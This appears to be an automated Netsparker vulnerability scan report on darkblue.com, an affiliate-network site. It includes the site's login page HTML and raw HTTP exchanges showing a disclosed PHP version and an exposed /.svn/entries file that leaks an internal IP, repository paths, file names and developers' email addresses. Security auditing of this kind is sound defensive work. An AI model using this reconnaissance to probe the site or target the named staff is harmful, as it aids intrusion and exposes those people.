<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <meta http-equiv="Content-type" content="text/html;charset=UTF-8" /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"/> <script type="text/javascript" src="/skins/lander/js/jquery-1.4.min.js"></script> <script type="text/javascript" src="/skins/lander/js/jquery.validate.pack.js"></script> <script type="text/javascript"> $(function(){ $("#contactForm").validate(); $("#affiliateForm").validate(); $("#advertiserForm").validate(); }); </script></head><body> <div id="container"> <img src="skins/lander/images/darkblue.png" alt="DarkBlue.com" title="DarkBlue Affiliate Network" /> <!-- CONTACT FORM /--> <div id="contact-container"> <h1>Contact Us</h1> <form id="contactForm" method="post" action="https://www.darkblue.com/index.htm" name="contactform"> <table> <tr><td><label for="name">Your Name</label></td> <td><div class="error-wrap"><input id="name" name="name" class="required" type="text" value=""/></div></td></tr> <tr><td><label for="email">Your Email</label></td> <td><div class="error-wrap"><input id="email" name="email" class="required email" type="text" value=""/></div></td></tr> <tr><td class="align-top"><label for="query">Your Query</label></td> <td><div class="error-wrap"><textarea id="query" name="query" class="required" cols="25" rows="5"></textarea></div></td></tr> <tr><td></td><td class="button-td"><input id="send" type="submit" name="submit" value=""></td></tr> </table> </form> <img id="vertical-divider" src="skins/lander/images/divider-v.png" alt="content divider" /> </div> <div id="logins-container"> <!-- AFFILIATE LOGIN /--> <div id="affiliate-login-container"> <h2>Affiliates</h2><h3> - Log into your affiliate account</h3> <form name="" id="affiliateForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="pub"> <table> <tr><td><label for="affiliate-username">Username</label></td> <td><div class="error-wrap"><input id="affiliate-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="affiliate-password">Password</label></td> <td><div class="error-wrap"><input id="affiliate-password" type="password" name="loginpass" class="required" /></div></td></tr> </table> <span> <input id="affiliate-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> <img id="horizontal-divider" src="skins/lander/images/divider-h.png" alt="content divider" /> <!-- ADVERTISER LOGIN /--> <div id="advertiser-login-container"> <h2>Advertisers</h2><h3> - Log into your advertiser account</h3> <form name="" id="advertiserForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="adv"> <table> <tr><td><label for="advertiser-username">Username</label></td> <td><div class="error-wrap"><input id="advertiser-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="advertiser-password">Password</label></td> <td><div class="error-wrap"><input id="advertiser-password" type="password" name="loginpass" class="required" /></div></td></tr> </table> <span> <input id="advertiser-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> </div> <p>&#169 2010 DarkBlue.com | <a href="#" onclick="window.open('/index.htm?info=1&section=aff_tc', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Terms &#38 Conditions</a> | <a href="#" onclick="window.open('/index.htm?info=1&section=privacypolicy', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Privacy Policy</a></p> </div> </body></html>
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /

/

http://darkblue.com/

Extracted Version

PHP/5.1.6

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 5723
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <meta http-equiv="Content-type" content="text/html;charset=UTF-8" /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"/> <script type="text/javascript" src="/skins/lander/js/jquery-1.4.min.js"></script> <script type="text/javascript" src="/skins/lander/js/jquery.validate.pack.js"></script> <script type="text/javascript"> $(function(){ $("#contactForm").validate(); $("#affiliateForm").validate(); $("#advertiserForm").validate(); }); </script></head><body> <div id="container"> <img src="skins/lander/images/darkblue.png" alt="DarkBlue.com" title="DarkBlue Affiliate Network" /> <!-- CONTACT FORM /--> <div id="contact-container"> <h1>Contact Us</h1> <form id="contactForm" method="post" action="https://www.darkblue.com/index.htm" name="contactform"> <table> <tr><td><label for="name">Your Name</label></td> <td><div class="error-wrap"><input id="name" name="name" class="required" type="text" value=""/></div></td></tr> <tr><td><label for="email">Your Email</label></td> <td><div class="error-wrap"><input id="email" name="email" class="required email" type="text" value=""/></div></td></tr> <tr><td class="align-top"><label for="query">Your Query</label></td> <td><div class="error-wrap"><textarea id="query" name="query" class="required" cols="25" rows="5"></textarea></div></td></tr> <tr><td></td><td class="button-td"><input id="send" type="submit" name="submit" value=""></td></tr> </table> </form> <img id="vertical-divider" src="skins/lander/images/divider-v.png" alt="content divider" /> </div> <div id="logins-container"> <!-- AFFILIATE LOGIN /--> <div id="affiliate-login-container"> <h2>Affiliates</h2><h3> - Log into your affiliate account</h3> <form name="" id="affiliateForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="pub"> <table> <tr><td><label for="affiliate-username">Username</label></td> <td><div class="error-wrap"><input id="affiliate-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="affiliate-password">Password</label></td> <td><div class="error-wrap"><input id="affiliate-password" type="password" name="loginpass" class="required" /></div></td></tr> </table> <span> <input id="affiliate-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> <img id="horizontal-divider" src="skins/lander/images/divider-h.png" alt="content divider" /> <!-- ADVERTISER LOGIN /--> <div id="advertiser-login-container"> <h2>Advertisers</h2><h3> - Log into your advertiser account</h3> <form name="" id="advertiserForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="adv"> <table> <tr><td><label for="advertiser-username">Username</label></td> <td><div class="error-wrap"><input id="advertiser-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="advertiser-password">Password</label></td> <td><div class="error-wrap"><input id="advertiser-password" type="password" name="loginpass" class="required" /></div></td></tr> </table> <span> <input id="advertiser-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> </div> <p>&#169 2010 DarkBlue.com | <a href="#" onclick="window.open('/index.htm?info=1&section=aff_tc', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Terms &#38 Conditions</a> | <a href="#" onclick="window.open('/index.htm?info=1&section=privacypolicy', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Privacy Policy</a></p> </div> </body></html>
[Possible] Internal IP Address Leakage

[Possible] Internal IP Address Leakage

1 TOTAL
LOW
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.

Impact

This kind of information can be useful for an attacker when combined with other vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is then consider removing it.
- /.svn/entries

/.svn/entries

http://darkblue.com/.svn/entries

Extracted IP Address(es)

172.17.1.192

Request

GET /.svn/entries HTTP/1.1
Referer: http://darkblue.com/.svn/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 08 Nov 2010 00:35:53 GMT
ETag: "6880cb-4f8d-ce7e8c40"
Accept-Ranges: bytes
Content-Length: 20365
Content-Type: text/plain; charset=UTF-8


8dir39656http://172.17.1.192/dbs/darkblue/branches/live/wwwhttp://172.17.1.192/dbs2010-08-30T04:15:20.608602Z39652b.dutton@au.darkbluesea.comsvn:special svn:externals svn:needs-lockaa7cf516-5f06-0410-ac50-8bdd415cf406 penguins.htmfile2010-01-12T00:34:16.000000Z4a918f0d499a9e5c56ade8d94eec2e882009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props error.htmfile2010-01-12T00:34:16.000000Z3f3dbc008b67965b303547948bed69122009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com xbTreeWidgetStatic.jsfile2010-01-12T00:34:16.000000Zae1f6b20282dd8f0becd11a6e16292fa2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props remittance.phpfile2010-01-12T00:34:16.000000Za3e582bf6574922665b7b1aaa9a2eb612009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props kirstydir webhosting_signup.htmfile2010-01-12T00:34:16.000000Z835ed0e82232701abb395e503765d02e2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com advSignup.phpfile2010-01-12T00:34:16.000000Z04601b43c27e8cc5499653991f469ebc2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props advindex.htmfile2010-01-12T00:34:16.000000Zba057a8a1281de096dacdb5ef55627b32009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props images.phpfile2010-01-12T00:34:16.000000Z978b89da2251c60af115490c822bb8592009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props scottdir infocenterdir cobrand_imagesdir termsandconditions.phpfile2010-01-12T00:34:16.000000Z4ee36f5f8f1169f66a2d641ee889bafb2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props affiliates.cssfile2010-01-12T00:34:16.000000Zfa993821d254e0a6696a145ff3802b642009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props MSN.giffile2010-01-12T00:34:16.000000Z9e36ad82bbcc8868321fa0ee2fa90fb82009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props catContentdir addSite.htmfile2010-01-12T00:34:16.000000Z6fbe601b6d7313c292c2fd0ad5318eb62009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props docdir movesort.curfile2010-01-12T00:34:16.000000Zfbb3fb18126e3e19b85b404f103990082009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props prefs.htmfile2010-01-12T00:34:16.000000Z4c53938af2ce8120c469e328feb8a5542009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props stat.wmlfile2010-01-12T00:34:16.000000Z55824e7220a937789e804446bfaf9aca2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props advfrontpage_subpage.phpfile2010-01-12T00:34:16.000000Z5e0c81b6a606a7bbf321308bb0547bbf2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props newsdir help.htmfile2010-01-12T00:34:16.000000Z01be14384259e710699c1cba1b9e2c682009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props cobrand_cssdir health_signup.htmfile2010-01-12T00:34:16.000000Z43476e85cb695302c8e1667025c8dab82009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props advtermsandconditions_adult.htmfile2010-01-12T00:34:16.000000Zb7c083b36a479f429f444bf5ba26f1dd2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props includedir mainaff.htmfile2010-01-12T00:34:16.000000Z3a2e1b7f05da0bbfbe9f8f8c301dfae62009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props t.phpfile2010-01-12T00:34:16.000000Zf0c104c163dc0f218d86d28f56debc902009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com date_signup.htmfile2010-01-12T00:34:16.000000Z9072f4466c90a37e8c08434ba64ed6752009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props gethtml.phpfile2010-01-12T00:34:16.000000Ze6740dd617309a802f175c111af7c0902009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props xbDebug.jsfile2010-01-12T00:34:16.000000Z45c6ca57dfa3d7db2fab8aaf5e785a6c2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props abestwebdir api.phpfile2010-01-12T00:34:16.000000Za63b92dd833167b42d9f3ae30518abe22009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props adminTools.htmfile2010-01-12T00:34:16.000000Z20080b6982d5b0595125ba1a7b5dbbe32009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props ariblk.ttffile2010-01-12T00:34:16.000000Z3e7043e8125f1c8998347310f2c315bc2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props stat.htmfile400632010-11-08T00:35:52.000000Ze003caacaeff85a251158a290bd84dda2010-11-08T00:35:09.760964Z40063a.clark@au.darkbluesea.comhas-props ftc_____.ttffile2010-01-12T00:34:16.000000Zc558b045b67d79282ac3f46176a9cd692009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props advfrontpage.phpfile2010-01-12T00:34:16.000000Za9a845904c6aa4d5cfb509d5da384a412009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props billingReturn.htmfile2010-01-12T00:34:16.000000Z55faf69264d6feaaa74b40ccf69c85f92009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props nutrition_signup.htmfile2010-01-12T00:34:16.000000Zacd536743db2947b333b4da94ef0c3992009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props affiliatesdir maintenance.htmfile2010-01-12T00:34:16.000000Z3cda14b1a713c8790a4e32060afd5ea12009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props AIM.giffile2010-01-12T00:34:16.000000Z15bf91fddf01770d5c7f4555e843df562009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props message.htmfile2010-01-12T00:34:16.000000Zb6c604145f97cf15e3ce77c8c0c1a2e82009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props invoiceapi.phpfile2010-01-12T00:34:16.000000Z1db3c5c7db0b358d4190f0308e1dc9b12009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props scripts.htmfile2010-01-12T00:34:16.000000Zf5bc031373d0e1120a4ce88a4a09b7df2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props frontpage_subpage.phpfile2010-01-12T00:34:16.000000Z92b90a2b55b2ac7ad723d17148f39aff2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props heapPing.phpfile2010-01-12T00:34:16.000000Z5ece7cf64f79db5a423db201aee749032009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com Yahoo.giffile2010-01-12T00:34:16.000000Z744fd4a4ef6d28f978319f7c93b595212009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props graphit.phpfile2010-01-12T00:34:16.000000Zcab0825a6f014f16dd05ba4a70f655802009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props homepagedir technology_signup.htmfile2010-01-12T00:34:16.000000Z0f61d4f58cfccd6bd901624757dcc4eb2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com networkdir debt_signup.htmfile2010-01-12T00:34:16.000000Z92dc5de35e1dfa2921d5f17bff670b082009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props favicon.icofile2010-01-12T00:34:16.000000Ze7226e9a5a856638c43892ebbbc291dc2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props x10camp.htmfile2010-01-12T00:34:16.000000Z4c6c634aaea6042b60358a24956b09952009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props hairloss_signup.htmfile2010-01-12T00:34:16.000000Z79a642c7784e53f9cdf641be8a60dd852009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props installmanagerdir weightloss_signup.htmfile2010-01-12T00:34:16.000000Z826724965b17276d268abacc302bf6792009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props check.htmfile2010-01-12T00:34:16.000000Z16692daf2eabda3c1f2007045ea683db2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props directorydir imagesdir sid.htmfile2010-01-12T00:34:16.000000Z3af220bd6407deea29f848462bd5396b2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com termsandconditionsdir consoleViewer.phpfile2010-01-12T00:34:16.000000Zeb56dfbd6d8c1166e2d2ceb76e732e442009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props frontpage.phpfile2010-01-12T00:34:16.000000Ze68eb3fe41924585847f45bfe4f5403c2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props details.htmfile2010-01-12T00:34:16.000000Z009f9cb6b759b1024b4f2ca58353809d2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props feedSearch.phpfile2010-01-12T00:34:16.000000Zb26f0218e2a66420dd34b45724ef4a852009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com pharmacy_signup.htmfile2010-01-12T00:34:16.000000Zea5a845e4f2866196b5913d9df1bedf42009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props codeCreator.htmfile2010-01-12T00:34:16.000000Zab1ccd95f110bb70d1df59ed053f90bc2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props controller_new.phpfile2010-01-12T00:34:16.000000Zcb13b453bb10f3c3b7099a152b4acf2c2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props arial.ttffile2010-01-12T00:34:16.000000Z124a965ffc59a680c2c20c69c29840322009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props popupsdir helpdir gaTerms.htmfile2010-01-12T00:34:16.000000Z568d9f9dada5fc43d1c9350ecc88607a2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props contactus.htmfile2010-01-12T00:34:16.000000Zf2d0a1312f0d3d690ff589bdb91354662009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props showCreative.htmfile2010-01-12T00:34:16.000000Zf4531f709aaae913e64a3fce5b51fd712009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props movesortx.curfile2010-01-12T00:34:16.000000Zb3d6fcd221f22181a34a6212d7b915b42009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props assetShow.htmfile2010-01-12T00:34:16.000000Zb434e50f7c09dbabe56575bfdd4b81232009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props casinoonnetcamp.htmfile2010-01-12T00:34:16.000000Z2568283ef414c17f8a91cd8a2f8a30d42009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props controller.phpfile2010-01-12T00:34:16.000000Z14bb4a0771eeca33806330259f7f4cdf2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props subPage.phpfile2010-01-12T00:34:16.000000Z9f5009d07974efecaca4de2787c7c5182009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props banners.htmfile2010-01-12T00:34:16.000000Z5ff549b5b72687aa762f9b710f48716b2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props ICQ.giffile2010-01-12T00:34:16.000000Zf5fe683506046cf3d1602d39b8b575922009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props darkblue.cssfile2010-01-12T00:34:16.000000Z1f2f967294832bca599825ab9d9f9c1d2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props kb-style.cssfile2010-01-12T00:34:16.000000Zc5c3a9b213589fbfd73292f4ae9cb7602009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props interfacesdir privacypolicy.htmfile2010-01-12T00:34:16.000000Zff2e32eebdf7dec6b63fe56eed5132f12009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props confirm.htmfile2010-01-12T00:34:16.000000Z09243c4e2623be6eccca69b9979b46c62009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props cacherdir unsorted.pngfile2010-01-12T00:34:16.000000Z469fcbbad3df574281363fe5b029db9f2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props sectionsdir googlewhackdir newsletterdir termsandconditions.htmfile2010-01-12T00:34:16.000000Z4772176145fb3fa16b3a1329f793960b2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props graphdir assetsdir index_new.htmfile2010-01-12T00:34:16.000000Za37cf4f8f2dbbc185709264f1d825f762009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props unsorted.giffile2010-01-12T00:34:16.000000Z75262b2bc3b6cc03593f862c8ffb35842009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props gstat.htmfile2010-01-12T00:34:16.000000Zd650dc0ee1365eddbe9aa7c44dec11062009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props sortdesc.pngfile2010-01-12T00:34:16.000000Zbf267c5d4b6963db4499f3645e7178b02009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props forgotpassword.htmfile2010-01-12T00:34:16.000000Zc3387b558117c9f02746574e019d32842009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props cPayout.phpfile2010-01-12T00:34:16.000000Z22053a8095744f707d6d2f05b017cfb02009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props balanceDetails.htmfile2010-01-12T00:34:16.000000Z5064164970de689dd6538cca053d48382009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props dating_signup.htmfile2010-01-12T00:34:16.000000Z13a7f59aee9f8f1e29900f1917bd34e72009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props subcontroller.phpfile2010-01-12T00:34:16.000000Zc40167834bb6a07259b26d0392e494982009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props caption.htmfile2010-01-12T00:34:16.000000Zb0c2b6c8b5004f3b249d4346772bb0602009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props statisticsad.htmfile2010-01-12T00:34:16.000000Z5c12bf7cea79900ccb07add08a9727cd2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props seochallengedir tourdir sortdesc.giffile2010-01-12T00:34:16.000000Z961d50bb5e5d6fcba3586f41a3af5fce2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props roarcamp.htmfile2010-01-12T00:34:16.000000Z7f31a6c427a21c45b41955da209e71b92009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props dentalplans.htmfile2010-01-12T00:34:16.000000Z096b180d6f133dbf414eee73e63357ac2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props index.htmfile2010-02-01T04:40:07.000000Z9c91340b41968371713387327eb71c232010-02-01T04:40:05.723051Z38669svnsyncerhas-props adtredirdir advertiser.cssfile2010-01-12T00:34:16.000000Z4ae5c481a0a364d71a146152bbc8116e2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props advdirectorydir sortasc.pngfile2010-01-12T00:34:16.000000Za6ad4c3f7565bb89d6ab3de0178d5f1d2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props healthreportdir sexualhealth_signup.htmfile2010-01-12T00:34:16.000000Z06d573421c6c40e14e74ac688f0a7bae2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props insurance_signup.htmfile2010-01-12T00:34:16.000000Zbe339be5fbfb59bd492492034bea79d42009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props 4ArmJoltScript.ttffile2010-01-12T00:34:16.000000Zc9d30a2f1810b730d12604c5020eb9122009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props getPaypal.htmfile2010-01-12T00:34:16.000000Zddfe595b881aa50615b6ee39bf7087ea2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props blank.htmfile2010-01-12T00:34:16.000000Z9fe2655fa355265b7dca39b68c29315d2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props sortasc.giffile2010-01-12T00:34:16.000000Z6e3b2418098d618e316a7df3b9e7410f2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props groupTest.htmfile2010-01-12T00:34:16.000000Zd4a7228859860b22249049b6a893b9ac2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props legaldir skinsdir se-guru_net-header.giffile2010-01-12T00:34:16.000000Zad86d62a37de6bb7644997fb8a4b94ef2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props customercaread.htmfile2010-01-12T00:34:16.000000Z78280e2e1e6ccb76a6c0aa83b4a6de712009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props advtermsandconditions.htmfile2010-01-12T00:34:16.000000Z0d3f59199b2eabc018637e3f6ff6006c2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props updateLinkStatus.phpfile2010-01-12T00:34:16.000000Z8bfe6d339088bb123855c10edff59b482009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props cobrandsdir ttfdir getcode.phpfile2010-01-12T00:34:16.000000Zddf4c83a15bfa88617388c0d870818102009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com adWarn.htmfile2010-01-12T00:34:16.000000Z89b5383329a05f911953a647e448ced62009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props iasbetdir describe.htmfile2010-01-12T00:34:16.000000Zdf962b7b0aafa5a65aaad4d3e10b781d2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props unsubscribe.htmfile2010-01-12T00:34:16.000000Zf45249b5edf2a50809a57d3628bb4a762009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props edit.htmfile2010-01-12T00:34:16.000000Z4282079864bbea49b05fb701a8a4a3942009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props payoutDetails.htmfile2010-01-12T00:34:16.000000Zd84ee7857e80a481dd3b4d0966494ac72009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props mlgraph.phpfile2010-01-12T00:34:16.000000Ze7d8faf445fa518472a3cc6d40fb7b392009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props banlist.htmfile2010-01-12T00:34:16.000000Zcf4c3e5e6e55f9c50f0474b69b477ceb2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props aff.htmfile2010-01-12T00:34:16.000000Za644145ad5334a7aa8b0f7334a7dfff02009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props sizes.phpfile2010-01-12T00:34:16.000000Z6f1ad9b7f5c071c642ec8da0a08e17662009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props gaTerms.phpfile2010-01-12T00:34:16.000000Z568d9f9dada5fc43d1c9350ecc88607a2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props casino_signup.htmfile2010-01-12T00:34:16.000000Zfd0a3277ef449bb82f98b693746031582009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props payoutHistory.phpfile2010-01-12T00:34:16.000000Z05dc9183902e75d3dc118cacd674ac982009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props 